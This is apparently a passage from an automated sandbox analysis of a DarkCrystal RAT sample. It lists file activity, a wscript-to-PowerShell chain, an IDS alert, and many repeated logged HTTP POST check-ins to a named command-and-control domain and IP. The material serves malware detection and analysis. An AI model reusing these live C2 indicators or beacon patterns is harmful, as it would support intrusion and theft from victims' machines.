                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\dd5be8a07a6153Jump to behavior
                                    Source: ZZ2sTsJFrt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ZZ2sTsJFrt.exe
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F0A69B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F1C220
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 104.21.38.84:80
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 1888Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2060Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 225372Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2060Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
